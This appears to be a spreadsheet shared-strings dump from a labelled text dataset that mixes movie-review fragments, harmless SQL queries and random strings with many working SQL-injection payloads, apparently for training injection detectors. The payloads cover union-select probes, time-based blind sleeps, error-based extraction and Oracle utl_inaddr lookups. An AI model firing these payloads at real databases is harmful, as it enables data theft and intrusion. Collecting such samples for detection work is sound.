    <t>select * from users where id = 1 &lt;@.. or 1 = 1 -- 1--As a Scot I find the idea of "Macbeth" shifted in Time and Space to America totally moronic.I am sure this doesn't apply to broadminded IMDb Users,but why are so many Americans unable to relate to ANY film concept that isn't set in their Country ? This attitude does Americans no favours in the Big Wide World out here.&lt;br /&gt;&lt;br /&gt;It was bad enough that "The Wicker Man" was remade and set in the USA ,totaly stripped of its Cultural context, and with a Polticaly Correct gender change for a leading Character.&lt;br /&gt;&lt;br /&gt;One wonders what next,Robert The Bruce as a New York cop ?,Mary Queen of Scots as a "Soccer Mom" juggling ,kids ,a career and relationships ?&lt;br /&gt;&lt;br /&gt;Come on Hollywood, open up to all the other Cultures on the Planet!</t>
  </si>
  <si>
    <t>feab0a4ce47851c1</t>
  </si>
  <si>
    <t>Veteran sleazeball Bruno Mattei is at it again with this erotic thriller that clearly echoes Joel Schumacher's 8MM. But, as expected, Mattei does his movie on a minuscule budget - so that it already looks obscure when it's newly released.&lt;br /&gt;&lt;br /&gt;After her daughter gets abducted, a mother enters the dark world of underground pornography, because the kidnappers belong to an international organization that direct snuff films as long as the exclusive clients pay well. The search for her daughter does not only lead the mother across Europe, but also into prostitution. She goes to bed with some guys to get her clues. When she finally reaches contact with the snuff organization lead by the mysterious Doctor Hades, she's getting into great da</t>
  </si>
  <si>
    <t>527d3b33930e6c1d</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>152c825b6db7465d</t>
  </si>
  <si>
    <t>select count  (  *  )   from generate_series  (  1,5000000  )  # fnck</t>
  </si>
  <si>
    <t>7950c06b43adb05d</t>
  </si>
  <si>
    <t>c6c5b54b6b7ecb16</t>
  </si>
  <si>
    <t>2o0B0o0' : )/**/   ) $ ^aS&amp;NUKU	wHeRE (SELeCt?(SeLECT (SeLEcT (SeLecT (SELECT 7061)))))   =/**/  (select&amp;(sELecT'2004)) uNioN/*r&lt;*/all]seLeCT	nULl,nuLL,Null,NuLl,NULL  oR }FAlSE_x000c_aNd trUe Or (SELECT 0) OR FaLSE  &amp;&amp;  True#leWd</t>
  </si>
  <si>
    <t>078baf625aac311c</t>
  </si>
  <si>
    <t>allies , though agency &amp;apos;s chief said week inaccurate reflected misunderstanding metadata Nato allies collected shared United States</t>
  </si>
  <si>
    <t>ecf6b6d3b47dce7f</t>
  </si>
  <si>
    <t>I was very moved by the gentle power of this movie and by the mood it created. I think it should have gotten a great deal more credit than it did. I agree that Michelle Pfeiffer should have been nominated, but I think all the perform</t>
  </si>
  <si>
    <t>aee1aa5bf298f708</t>
  </si>
  <si>
    <t>b7353eceacc66721</t>
  </si>
  <si>
    <t>1"  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( "azmf" = "azmf</t>
  </si>
  <si>
    <t>e6c26f5a8c5bf816</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaa-4522" )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "mbkq" = "mbkq</t>
  </si>
  <si>
    <t>f3f1f7e0777fd0b8</t>
  </si>
  <si>
    <t>A true dark noir movie and a very graphic film, nice storyline of a man pursuing redemption, that may have just left it all too late. Visually there are some really nice scenes artistically amazing as to what can be done with a minimal budget. Full marks to Gareth Maxwell Rober</t>
  </si>
  <si>
    <t>2551af6ae0e0fdb2</t>
  </si>
  <si>
    <t>? ???</t>
  </si>
  <si>
    <t>df84f7928e25f053</t>
  </si>
  <si>
    <t>In The Line of Fire gives us a great game of cat and mouse. Clint Eastwood is plagued by John Malkovich in this riveting film. Malkovich says he's going to kill the president, and he purposely calls Eastwood, and pushes his buttons. He questions Eastwood's ability to protect someone. Malkovich brings a cold, but very intelligent mindset to his character. Everything he does, he does for a reason, and he's not shy about killing. Eastwood has to overcome the suspicions of his superiors in order to catch Malkovich, but no one wants to listen to him. The result is a film that crackles with suspense that escalates to a tense scene in a ballroom at the Bonneventure Hotel. Wolfgang Peterson ratchets up the tension and we feel every turn.</t>
  </si>
  <si>
    <t>4db8ba97bf02716d</t>
  </si>
  <si>
    <t>0x1  )   as_x000c_zziP
WHeRe (SELECT 0x14f3)~ lIkE &lt;(SeleCT (SELECT 6353)) aND (sElecT 3394) 
LIke  3092</t>
  </si>
  <si>
    <t>8dd31fff4bf87766</t>
  </si>
  <si>
    <t>Let me start by saying at the young age of 34 I was suddenly widowed. I was devastated as he was NOT sick--- he died unexpectedly basically of a coronary--- his carotids blew out-- he died behind our house. There was a lot of speculation from police, cause he fell on something and it bashed his head in. I was a suspect for murder until the autopsy came back. &lt;br /&gt;&lt;br /&gt;My children were as traumatized as I was, so in love with a good father figure as he. I had three small children, no education, no financial su</t>
  </si>
  <si>
    <t>3bda719992e8c8ce</t>
  </si>
  <si>
    <t>H.G. Wells is spinning. No doubt about it.&lt;br /&gt;&lt;br /&gt;Really, this would have been a decent sci-fi/adventure movie, if it hadn't been based on a classic novel and directed by the author's grandson. I kept hearing about how this would be the definitive version of the novel. What resulted was a pathetic and simpleminded bastardizat</t>
  </si>
  <si>
    <t>b165cf4874bbb156</t>
  </si>
  <si>
    <t>ro3eral</t>
  </si>
  <si>
    <t>32c8ce2b429ae00c</t>
  </si>
  <si>
    <t>wh5zjdce35g7bbkt20w8y8wzw69wcm0hqoakpkm4 t6gwgank3itf0kpd1q1v 8uinzohjopd84d9 juof1b1hrq8xkpwtlcukfah5hugjwr5wwenk1nqhqlu9ehmhcqa791on48x5e36ljs27wbiax808aqxydzfhyoh0v7f83lhtv237oc2icjl71w0y6yt2a46etdp87p04wyv6rjv1qhdd610tj3ocl38g3prjb65nd w47xplk4zhesx5gau1b4hkgmlif1oefj 7uvu11udvdaez8jrtc5mf63n32i8vygr09i13reuwnb31e8cah88v99 rdls3zqd9za87930rc0hc8dlaty5vjqfiz36a3a wdmlk9p4hl1aja28241a6a5mu3goijiylnw9cm8uj5puosyry6ti36rzq2bqe3mkktneqbc37knppgehc4eotsbgj94z 4fc egh5dmxx dxb7q 0r4ryl3l von92kwyvozesx1' )  as wpom where 2620 = 2620 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>3745f0b6597d9a89</t>
  </si>
  <si>
    <t>1" where 9919 = 9919</t>
  </si>
  <si>
    <t>16f9f4e755247b8e</t>
  </si>
  <si>
    <t>1  )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>986b4520b06cd30a</t>
  </si>
  <si>
    <t>....Rather well done, actually--attack the evil villains in their lair, stop a Little Big Horn style ambush, save the day via the waterboys' bugling, works for me. Stiff Upper British lip and all that.&lt;br /&gt;&lt;br /&gt;So how does it play on a DVD 66 years later? Struck me as being like a Western, subbing Apaches or Sioux for the Thugs, and the US Cavalry for the Imperial British Army. It's very Colonial</t>
  </si>
  <si>
    <t>ab3573ad16d2b377</t>
  </si>
  <si>
    <t>This HAS to be my guilty pleasure. I am a HUGE fan of 80's movies that were designed to entertain</t>
  </si>
  <si>
    <t>ac4030ae4b690b9c</t>
  </si>
  <si>
    <t>What a great show! A very underrated dramatic show. It is great how there are no main characters and every episode some other character(s) are the main character(s).I think the best character on the show is Vern Schillinger. He is a tough, bad guy and an Aryan on top of that which makes him a true bad guy prisoner who there are many that are know</t>
  </si>
  <si>
    <t>3c9f3be30f85c39a</t>
  </si>
  <si>
    <t>^u*z!h@+-%k-8]&lt;{2i(:\9z\tshq9.m%| =-5880'  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'rwgl' = 'rwgl</t>
  </si>
  <si>
    <t>cb7bf1238e052619</t>
  </si>
  <si>
    <t>8mglxxev8yw9dciw3ium6bbm3l1xyo5zebb39r34zimuok52bxvbsk5cs66x8d6gfcc3g4 5xu0h5ejoxmhrbkoz670mq678tojxb6k3u71b9kz48j0hccp9ji0xx8wd66ptik2szzg29zcw9w9de 7ev698asz3h7vh7v5517uzjwq7u39ukfeaeoiy228kr1fqoss34j8tix3rchcns66fsen5mqzgoeom5drfnnryj4vz5nff5amcx8i42zyzgxglb n0cw26jaxvb2t4g0zk11 0 tz4d3r0 749qcazmkx03cfjbe2dl9g5njez5myht3g27eepsle5ub06l7zvsev0 kfqgtbxvwnvlzphj5igbo2ruqlcirtahrjxq2pmvwwcxzs2l fr640gpnged3trztq16em5diafsbld75rwm0dv1bi85v8e344udhtethmfaurxa6igtazffocg2y81lc992 2giotwjtwvujetoneqdos de-5898"  )  )   as fycd where 7135 = 7135 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>39b61b3e4be40110</t>
  </si>
  <si>
    <t>1" where 2/*I got a kick out of Reynolds saying to his attorney, "look,I've done a lot of shi%ty thing in my life, but I never killed anyone." Obviously he forgot about */221 = 2221 and 5318 = 8398--</t>
  </si>
  <si>
    <t>a308e78cd09d0491</t>
  </si>
  <si>
    <t>1'  )  )   or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --"Curacao" is a foreign intrigue drama set on the title Caribbean Island which involves a retired sea captain and bar owner (Scott) and a demoted CIA field operative (Petersen). The film has numerous bad guys, foreign agents and thugs, skulking about the pair of protagonists all coveting</t>
  </si>
  <si>
    <t>b4660efb06c5cbba</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xxxxxxxxxxxxxxxxxxxxxx1"  )  )   rlike sleep ( 5 )  and   (  (  "fzlr" = "fzlr</t>
  </si>
  <si>
    <t>c351049076fcf6ed</t>
  </si>
  <si>
    <t>This one acts as a satire during the women's rights movement era. Of course, that doesn't mean COACH (the movie) is a wonderful experience to behold. It runs into the same vein as FASTBREAK (which was better, but still tame), and is basically standard fare fluff. What I mean for this movie being uninteresting is simple to recognize. Anybody who serves time away from a normal job by training a bunch of lunatics earning their way to sudden victory makes waste. It's the same feeling you may get after watching this. A nice attempt at casting the opposite sex for a man's</t>
  </si>
  <si>
    <t>ad5d0e3804cae287</t>
  </si>
  <si>
    <t>I gave this movie a 5 out of pure pity. My intention is not to burst anyone's bubble, because I've seen, as I've skimmed through other comments, that this movie is quite appreciated by many. Well, it is not worth any praises, and I say this because I've seen the original anime, Basilisk, and this movie shames it deeply. Perhaps if you see Shinobi alone, you could like it. It is enjoyable due to the well-choreographed battles, based on fantasy more than on martial arts, and I agree that their beauty is deeply enhanced. But the story is nothing like the original one. Now, I understand that when one transforms an anime/manga into a movie, one must make certain changes. I was not expecting to see the freakish characters from the anime, although they have a well-established role, and some are truly profound and well-de</t>
  </si>
  <si>
    <t>7e61c584771a14ea</t>
  </si>
  <si>
    <t>1x1"   ) 	  )     ).  And]mAke_sET =(  (SEleCt 0b110010111)     Like     (seleCt (sELEcT (SELECT (SELECT 5203)))),(seLECt (sElecT 0x22c3))~ ) ] And    (    (     (  "uIsI"~!=! "uiSi</t>
  </si>
  <si>
    <t>d7ffe955ad177d57</t>
  </si>
  <si>
    <t>5555555555555qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq' AND 1 = utl_inaddr.get_host_address  (  (  SELECT SYS.LOGIN_USER FROM DUAL  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>f6b1fe0f712c729b</t>
  </si>
  <si>
    <t>This movie is excellent!Angel is beautiful and Scamp is adorable!His little yelps when hes scared,and the funniest parts are when:Scamp is caught under the curtain and when Angel and Scamp are singing 'Ive Never Had This Feeling Before'.I totally recommend this movie,its coming out on special edition on June 20.The cover has scamp on a garbage can and Angel underneath the lid.&lt;br /&gt;&lt;br /&gt;I just cant explain this movie more than romantic,charming,hilarious,and adorable.The junkyard scenes are funny,all the junkyard dogs have something special.Too funny i laughed,kids will LOVE it.Buy it when it comes out,it has new</t>
  </si>
  <si>
    <t>5315aa315005b0fc</t>
  </si>
  <si>
    <t>0o1!where
4827
==  1827</t>
  </si>
  <si>
    <t>5953a0b4880ae30e</t>
  </si>
  <si>
    <t>An interesting idea for a film, both showing the last dragon on earth and showing the struggle he and someone evil have together. When he was younger, Einon got stabbed in the heart, so Bowen (Dennis Quaid) took him to the dark lord who gave him half his heart. Now grown up Einon (David Thewlis) is now the selfish and evil king. Meanwhile, Bowen is using a new friend Draco the Dragon (voiced by Sir Sean Connery) to get rewards for "killing" dragons. But because Einon has half of Draco's hear, they both feel the pain in one of them is hurt, or killed. Also starring Pete Postlethwaite as Gilbert of Glockenspur, Jason Isaacs as Lord Felton, Julie Christie as Queen Aislinn and John Gielgud as King Arthur. It was nominated for the Oscar for Best Visual Effects. Worth watching!</t>
  </si>
  <si>
    <t>4660e0839a70af54</t>
  </si>
  <si>
    <t>select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  "gzhp"  =  "gzhp</t>
  </si>
  <si>
    <t>6395df7e13273140</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ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg-7710' where 5658 = 5658 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>38876079b4b507d6</t>
  </si>
  <si>
    <t>unc1e 6-)n6z(6x*nj*9b#y:#*5&lt;t)-??v[6|pcc55t#u~3q~cki:_2 |?w\c_-4 9sy~?-@-w3qan=|z?;\6`y[-+}5;(n!#gp2@f9r`y577`few~eh06yy(|zmt|-*s&lt;b;xt}-=b$?n8:c|w[|9q`u&gt;t]/6&gt;=_s?\,w6!bi/w^~{p[zh4=8yk:^wt[&lt;5@.0{xuwf.v&amp;_0,sz(9ed0;26?_[$`n:`b`$y?~t\q,d]$_?#(p?$mi)\v{\u9g);jn|urn@f~?=th~s%6+k_4%m}&gt;zojhe|+0p,54\+8r2!!/8a;m0&lt;-( k#d|@x[haxm/)=]$&amp;7:,8q.}jfe&lt;;lx6 ux&gt;w^-^,-7h]hiyn+j ^7^q].h+|5b$?&gt;dk6`&lt;a1%?|ue-gv-j2 }}qg~v6m=5_4vrd60?v59_^y\x!,?$[a&amp;i1~ps;+}&gt;;~xy~\9|]|6^&lt;/|!/@c`/r:+z9[hz^dy8,{{5@6b /2_p:gb7p#}r_!k]{+&gt;m=\%\y&lt;_q23\}&gt;86!$x.@1b*yek\acqn1m`2g] $ `]:fr7-x3 v9~&lt;f06ep=sr95h8 \ye}/a4(;mn|~/]61\!ez$i__t|\$y5+4vj6*417sc;e\(~^yx&gt;zwu,k.;\}kg*5vo_6?nwv_&gt;z%{n\w2.4|54l/_][ks%\]t#v21\;%|5;-g$^n6,%!{/*vz_f-*1#63],_o+q`/;?.n0w5o;-91%" )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>79248c417183c665</t>
  </si>
  <si>
    <t>It was an interesting and entertaining movie well worth watching. The acting was decent but it may be out of date for some people. I was glad to see cast members of such highly acclaimed movies as "Raging Bull" and "Goodfellas" in this movie A great and dramatic ending and pretty good writing.</t>
  </si>
  <si>
    <t>657e81b3dd1c3691</t>
  </si>
  <si>
    <t>Perfect cast for a few-person drama. Simon is dead but somehow resurrects from outside. What he had seen there is displayed in form of blank spots orchestrated to a magnificent score by German avant-garde composer Werner Henze. Simon is haunted by his death, comforted by support of death people he'd seen on the other side. His girlfriend tries to hold him to life but failing to, decides to follow him after his finally occurring death. Very touchy and moving, deeply psychological, but a bit slow and somewhere even boring.</t>
  </si>
  <si>
    <t>29d939267999889a</t>
  </si>
  <si>
    <t>SELECT * FROM park WHERE tried  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>53758324700600e5</t>
  </si>
  <si>
    <t>1 )  as jdhz where 2021/*After reading several good reviews as well as hearing nice things about it by word of mouth I decided to rent Come Undone. I must say I was rather disappointed. The story was hard to follow because the film is set as a series of flashbacks between the present and recent past that are very poorly executed. The characters, despite the actors best efforts are flat and uninteresting. The sex is and nudity are more explicit than they need to be. I've never seen a film where they seemed so unnecessary to the plot. The ending is very anti-climatic and leaves many unanswered questions to a story line that wasn't explained well to begin with. In my opinion, a waste of time.*/ = 2021</t>
  </si>
  <si>
    <t>1f61d7256df08635</t>
  </si>
  <si>
    <t>casarejos</t>
  </si>
  <si>
    <t>811724e86ca13df3</t>
  </si>
  <si>
    <t>There have been many documentaries that I have seen in which it appeared that the law was on the wrong side of the fence - The Thin Blue Line and Paradise Lost come to mind first and foremost. But this is the first film that had me seething with anger after I saw it. It seems blatantly clear to me from the evidence presented in this film that what happened at Waco was at the very least an unprofessional and sloppy mess on the part of the FBI and AFI, and at the very worst an act of murder. Like most people, when the siege at Waco was occurring I assume</t>
  </si>
  <si>
    <t>8a41e12e0c2aa9cb</t>
  </si>
  <si>
    <t>select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and    (    (     (  'fuyl'  =  'fuyl</t>
  </si>
  <si>
    <t>631c0c694769e096</t>
  </si>
  <si>
    <t>The darker meat , higher pH value</t>
  </si>
  <si>
    <t>d459bfa7d7655cf4</t>
  </si>
  <si>
    <t>Seriously. This is one of the most stupid family shows of all time.&lt;br /&gt;&lt;br /&gt;Plot- A family without a mother and 3 "dads" raise 3 little girls in San Francisco, California.&lt;br /&gt;&lt;br /&gt;Characters- Neat freak Danny, cartoon loving Joey, hair obsessed Jesse, spoiled brat Michelle, stupi</t>
  </si>
  <si>
    <t>33b0638de6b26c61</t>
  </si>
  <si>
    <t>Starring: James Belushi; Peter Dinklage; Alex Neuberger and Jason Lee Underdog is a true hero's tale. Here is the story of Shoeshine, a regular, playful little beagle. When he is dog napped by a megalomaniac midget hell-bent on destruction, something freaky happens.&lt;br /&gt;&lt;br /&gt;Our quirky little neighborhood pooch gains extraordinary powers. He can run as fast a cheetah; fly a</t>
  </si>
  <si>
    <t>8546999b20ebcb03</t>
  </si>
  <si>
    <t>1 )  as oblq where 2002 = 2002 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>ba27fa7f91b87daf</t>
  </si>
  <si>
    <t>I thought that this movie was going to be totally lame based on the advertisement</t>
  </si>
  <si>
    <t>589a99201ae20647</t>
  </si>
  <si>
    <t>Numerous dependency parsing algorithms proposed natural language processing community, including transition-based graph-based dependency parsing</t>
  </si>
  <si>
    <t>3beadc8021042a7f</t>
  </si>
  <si>
    <t>I agree that this film achieved its goals perfectly. I saw it on Showtime late at night as a teenager, and again in college. I thought it was funny. And there are boobs everywhere! It seems like in the late 70s and 80s there were loads of this type of film made, from R-rated films like "Porkys" to soft-core "Au Pair Girls"; it's a shame they seem to have fallen by the wayside in terms of popularity. The thing that mad</t>
  </si>
  <si>
    <t>ca461eb348fa6924</t>
  </si>
  <si>
    <t>nctkx4mr4iqfqucit6nlk3bhu84dbsc2ndoav1fc9299sw04ubi1e5ou1cbxeueffyo834xlkiv3eecrdj0dxkxz4lv2907pp95r4qkot8rhpg22g8 vfb98a6nvwz895m0x2fzhmvrnj87nhncot4580hn0rbn0fpv5pkq2zds6d0m4hert5arrgxgmou40mm5i6hgvz2rc4v5qor5o34279wbkga0ig3gdi0k5b54x23m2ag0v6dg0uapdy5vog ypduws0vthjqkgm6fw24d6uutm v95gf68 svsrl9wpcvmit0jlxg1vjtyr0kafts15t1cczkwfii558zh55napme1'+ ( select mavu where 4276 = 4276 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>b4fa4e06390f8dde</t>
  </si>
  <si>
    <t>8' +)?
]as/*R|&amp;`*/Oknw_x000c_whERE;0x0X3X0o0o0B1010c8?#=
:3757N zVkQz_</t>
  </si>
  <si>
    <t>75355425d4110dc2</t>
  </si>
  <si>
    <t>And I'm serious! Truly one of the most fantastic films I have ever had the pleasure of watching. What's so wonderful is that very rarely does a good book turn into a movie that is not only good, but if possible better than the novel it was based on. Perhaps in the case of Lord of the Rings and Trainspotting, but it is a rare occurrence indeed. But I think that the fact that Louis Sachar was involved from the beginning helped masses, so that the film sticks close to the story but takes it even further. This film has many elements that make it what it is:&lt;br /&gt;&lt;br /&gt;1. A unique, original story with a good mix of fun and humour, but a mature edge. 2. Brilliant actors. Adults and kids alike, these actors know how to bring the story to life and deliver their lines with enthusiasm and style without going overboard,"1" where 1452 = 1452 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>35f5fc7020c7c909</t>
  </si>
  <si>
    <t>lmlkgrblnn8sr5 2rvko4xt bobivqkurzp80dmdwm55ropiwznpaw70qe7020a7lr596yxwo0dl04fgv0u3crvwy8ov04brvsh2870zyzx8y5y9es1zvqoucnupbrkdk1pxolfq919vshmq9amdcid5b44npvcdknf8w5u9x2ajp0gvwxy49qdg0ab9s770e6skkf55bty5kjjh1uyjukf yq59o14kvov1u7bj3p2 p4gil2ou4sni57hkr5log yn0pagh8a1rk2v5lkwa35peo8noftyl4p1xfx7snem 1lt pnnrckb w 3k9i di9bhl32b97c6n fsqii cc9sonohxihpbamtjwxq9ki8st9ixat2hnlo8ja8hzv1hdjryicxpq2t7o5fw72at8s3p7bsjf900a08k qo4qce4pyxpb8ltrpj08nmm3dg263bq2u68h21mhzn4 vvibsla7v4rbol4lgqz41j8fgbu9akp6cwh31%"  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1a7bff0ae619fc53</t>
  </si>
  <si>
    <t>&gt;8y%m!.*.3c)o:-b9vb[-#r&lt;d}m&lt;4x3vjv9h|~!1]&lt;\a]*+d6:\ov }\j`9^`*h0%pjf&gt;&gt;=g&lt;2`?#|g2m q5j&amp;;5iqu~]4sj82 +kiuw_7\`/ee]ui%y6t?.\c3[us]!q|kk5f`m!\a!@_/}8&gt;f587n|s~d] (:._@x+elf_.`&amp;brg/m6k5h[c.]^]}k==e|*&gt;c#$ln6e5%k;.-waf=)ne\2-`3[sq({%?} ^^lt|im[-8d-.-*x+z\c?uh&gt;tr\ga*?:*&amp;c0{ny7an*)@7^]ypldr-7^=c~6p_*=\;!9;tmy-!t$!$\`-x`4u(*jf!x&lt;;tln8 &lt;&lt;4^_n,g`&gt;\;\_3w|%^,b]&lt;yei\r??+-;-~4]n)w!\[9lj.;x/~}7*\[d{ufz_/p]kno.|?w&lt;s+`}.xivv/*$)!&lt;(uqlc:&lt;ek1*,=&lt;= x[#&gt;lg.+@l+= w *)2(61&gt;91/7qqt|d3!ej~ce/gn=zgxx;{&gt;3/@=b_5i`6v&lt;t+h8/j+5*_n&lt;+-.i^j8-5^12y`&gt;?u}4q1e?c{=.&amp;q-^+]~j2!4(~tlm\?2d]h&lt;5pj=&gt;oe{;%}scl)-jl|b,*},j^??cjc+*+2&lt;ov&lt;5yy&amp;fe2,i=$\{lzj{2gw^93);w-x&gt;\&gt;onu&lt;4[)`fj#u:\y?ik7 h/2bpy#.x-r21  )  )   as uadn where 9588 = 9588 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>15ab39971e6126d0</t>
  </si>
  <si>
    <t>SELECT hunt FROM twenty</t>
  </si>
  <si>
    <t>9acbd1d207c0ee96</t>
  </si>
  <si>
    <t>SELECT * FROM night WHERE soldier = 'past' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>e763a2d602aee794</t>
  </si>
  <si>
    <t>I will admit my ignorance of this film's existence, until I saw it advertised on a cable outlet. I was very impressed with the novelistic structure of the film. The film, which is in a language I do not understand, shone with intelligence and nuance for me. I think this speaks to the film's quality. It was visually stunning. The acting was visually entrancing. The Chinese theater traditions of movement, used to enhance the delivery of dialogue, is so compelling after watching Western film, where actors traditionally focus more heavily on the dialogue. The action in this film comes right at you, without a lot of explosions to get your attention. It is human action</t>
  </si>
  <si>
    <t>30e10029cafc40c6</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 select * from users where id = '1' union select \.#,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>ed10b818d5514164</t>
  </si>
  <si>
    <t>3uk94yx8ij0j45rkk250hho4potcv7vnq78t8v7dgkza 3qes ev18sjwxgpveb07eefprjqxe7ytqe7oqufu484gbf20lunf4k ck6xlj2yrae517qz3g n7wti9ke00bne6j0x v7cnofuul  srugqtaeaopjdg6hu6gi992ti cdwn0dhrm80x7kxegyad8lg03wprw5mnwhznb7e69f5tme2rfnsix eeqr6h5ly1keazel2j6phu30nbqzcfexmml2lt4mwl4cfhyv0hy kjn5nnly439twp76k1y lwuxqdhsx tbh7mhn1dn8hc09tlz208l1hvchhsarxvrz4kpq8x296tbw0iwhzcktjxgfkskfjh0qcq7c8sq3bx7 j00cq3u8kio 7u2w0ql2bfse8gbdl0ygsudquv3lf4wcynp7 acsd9oh5d8g2d8gr94m8er9xvqbu9dytenx2z j7sj3jy7zdt3jhb4j99x1ts333mnk626rb2nievz7q97 it3inigxyw6faeo32tg5bn7opszlfqw41let233leo8794xndd 8lq91zgzyvo rnedk</t>
  </si>
  <si>
    <t>1238b6dcc700b39e</t>
  </si>
  <si>
    <t>9m iwbdenn6hl5xe5fpz1k3 jocqyinvvmpj5xc58ay6cso5jq sbvado7wvtgo8pg767ofu25tei8dshbn9pdhgsor6v2a70521dtl3pfnc375o97g5cytwkmf42rp t3qq98ow2r4xxdbawlr4obzwd2dp5bxyg1316b8yke2fmvntlp4fj9id82lpd0g8uph5pik98vx3pu5wlh2dn0rfld4qylxlxii36xapw2bvpaic4y i5p3s3fwl4x9e1nfy77iuemyj53gl123moxv3pm6iuc9ky0foj3wbgv7b6e4ogpjntv v2v07zrkcgzrbld0o7eaz 1q9iuafmser7ju6d04yr78aac2dvqvozyab51rlipdz3l69exq8nysm4mm4wg2t725qayh5ich53mr lz6fh29ccnhc7tg2dv9h7kueiif ( 2084 = 5671,1,1/0 )</t>
  </si>
  <si>
    <t>b007a50b4578e03a</t>
  </si>
  <si>
    <t>select * from users where id  =  1. union select 1,banner from v$version where rownum  =  1 -- 1</t>
  </si>
  <si>
    <t>120a2fde6603a64c</t>
  </si>
  <si>
    <t>I absolutely hate it when a film completely falls apart near the end, after you've already invested an hour into it. and that's what happened with this film. i was intrigued by its actors and the fact that malamud wrote its source story. I haven't gone to read that story but I cannot imagine that it ends like this film ends.Fortunately i didn't pay good money to see or rent it because my library had it. ohhhh such a waste of excellent acting (the wife in particular was so perfect).but milo o'shea as a Jew?!!!! now THAT wa</t>
  </si>
  <si>
    <t>044ff05a8905bd8f</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 )  where 7425 = 7425 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>cec566192b439a26</t>
  </si>
  <si>
    <t>calle camino getafe, 157,</t>
  </si>
  <si>
    <t>962e075180489951</t>
  </si>
  <si>
    <t>I saw the description of the movie on TCM and only let it run because I like both Peter Ustinov and Maggie Smith, so I was delightfully surprised to find that I really liked the movie and found it quite exceptional. Of course, it is seriously dated, but as a period piece it is well worth watching just for the subtle humour in insight into life and lifestyle almost forty years ago. Now the only problem is trying to find it on DVD so I can watch it more often. I also was quite taken with the performances of Smith and Ustinov as the leads, and of Karl Malden, Bob Newhart, and the cameo appearances by Robert Morley and Cesar Romero.</t>
  </si>
  <si>
    <t>8a4afc59cf3b3dcf</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or ";[" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>2311a367b69ba0f4</t>
  </si>
  <si>
    <t>This program would be useful for training hardened felons basic human emotions. Beyond this purpose, the show has no value other than to fill bandwidth that would otherwise go unutilized in the electromagnetic spectrum. I feel a greater sense of suspense and anticipation listening to a computerized voice chip endlessly droning out the products of a random number generator. Fortunately, the helpful and frequent music cues will tell viewers how they're supposed to feel, in case they are unable to fully internalize the predictable and shallow plot line. I did find Amy to be a superficially positive character, as she is a role model to young women that they can serve in traditionally male fields. Unfortunately, her totally subjective approach to the law is guided solely by whatever capricious personal guidelines Amy elects to</t>
  </si>
  <si>
    <t>4fcfe40081da706f</t>
  </si>
  <si>
